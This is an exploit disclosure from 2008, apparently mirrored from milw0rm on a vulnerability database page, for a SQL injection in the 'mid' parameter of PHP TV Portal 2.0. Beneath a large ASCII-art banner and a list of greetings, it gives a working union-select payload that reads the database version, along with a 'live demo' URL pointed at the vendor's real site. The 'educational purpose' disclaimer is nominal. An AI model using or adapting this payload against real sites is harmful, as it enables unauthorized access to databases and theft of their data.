PHP TV Portal 2.0 - 'mid' SQL Injection

🗓️ 29 Nov 2008 00:00:00Reported by Cyber-ZoneType
PHP TV Portal 2.0 'mid' SQL Injection vulnerabilit
***********************************************************************************************************************************************************        
[!]                                                                                                                                                     [!]
[!]                                  OOOO             O                                 OOOOOOOOO                                                       [!]
[!]                                 O    O            O                                 O      O                                                        [!]
[!]                                 O                 O                                       O                                                         [!]
[!]                                 O      OOOO  OOOO OOOOOO     OOOO   OOO OO               O      OOOO   OO OO     OOOO                               [!]
[!]                                 O       OOO  OOO  O     O   O    O    OO  O             O      O    O   OO  O   O    O                              [!]
[!]                                 O        OO  OO   O     O   OOOOOO    O     *******    O       O    O   O   O   OOOOOO                              [!]
[!]                                 O    O    OOOO    O     O   O         O               O      O O    O   O   O   O                                   [!]
[!]                                  OOOO      OO     OOOOOO     OOOO   OOOOOO           OOOOOOOOO  OOOO   OOO OOO   OOOO                               [!]
[!]                                           OO                                                                                                        [!]
[!]                                          OO                                                                                                         [!]
[!]                                         OO                          Proud To Be MoroCCaN                                                            [!]
[!]                                        OO              WwW.Exploiter5.CoM , WwW.No-ExploiT.CoM , WwW.IQ-TY.CoM                                      [!]
***********************************************************************************************************************************************************
+----                                                        Bismi Allah Irahmani ArraHim                                                             ----+
++--------------------------------------------------------------------------------------------------------------------------------------------------------+
++                                                [ PHP TV Portal<= 2.0 (mid) Remote SQL Injection ]                                                     ++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
:   Author   : Cyber-Zone   ( Abdelkhalek)                                                                :       :                                       :
Â¦   E-MaiL   : Paradis_des_fous[at]hotmail[dot]fr                                                         Â¦       Â¦                                       Â¦
Â¦   Home     : WwW.IQ-Ty.CoM                                                                              Â¦       Â¦         MySQL Version Is :            Â¦
Â¦   TeaM     : Mor0ccan Nightmares                                                                        Â¦       Â¦                                       Â¦
Â¦   Script   : http://www.businessvein.com/                                                               Â¦       Â¦                ![ 4 ]!                  Â¦
Â¦   Download : http://www.businessvein.com/php-tv-portal.html                                             Â¦       Â¦                                       Â¦
Â¦   RisK     : High [Â¦Â¦Â¦Â¦Â¦Â¦Â¦Â¦]                                                                            Â¦       Â¦                                       Â¦
Â¦ --------------------------------------------------------------------------------------------------------+       +-------------------------------------- Â¦
Â¦                                                          From The Dark Side Of MoroCCo                                                                 ++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
:                                                                                                                                                         :
Â¦  Remember    :                                                                                                                                          Â¦
Â¦  -------------                                                                                                                                          Â¦
Â¦                                                                                                                                                         Â¦
Â¦  This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages.                                             Â¦
Â¦                                                                                                                                                         Â¦

++--------------------------------------------------------------------------------------------------------------------------------------------------------+
++          [!]  Fi Khater Mgharba wahed wahed , Kima tayGol Khoya JiKo , Ana Maghribi , Ana Arabi , Ana Muslim , Jib L3azz Awela K7azz  [!]             ++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++


ExploiT :

http://localhost/tv_portal/index.php?mid=[SQL]

[SQL]=-11+union+select+1,version(),3,4--

Live demo :

http://www.businessvein.com/tv_portal/index.php?mid=-11+union+select+1,version(),3,4--

Raha Nayda Nood
Mgharba :)


+--------------------------------------------------------------------------------------------------------------------------------------------------------++
+----                                                                  ThanX To                                                                       ----+
++--------------------------------------------------------------------------------------------------------------------------------------------------------+
++[  $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ CraCKEr , $ Oujda-Lord , $ GeneraL , $ Force-Major , $ WaLid , $ Oujda & Figuig City ]++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
=                                                                    [AttaCk Is CompLet]                                                                  =
___________________________________________________________________________________________________________________________________________________________

# milw0rm.com [2008-11-29]
29 Nov 2008 00:00Current
7.4High risk
Vulners AI Score7.4
PHP TV Portal 2.0 - &#039;mid&#039; SQL Injection

PHP TV Portal 2.0 - 'mid' SQL Injection
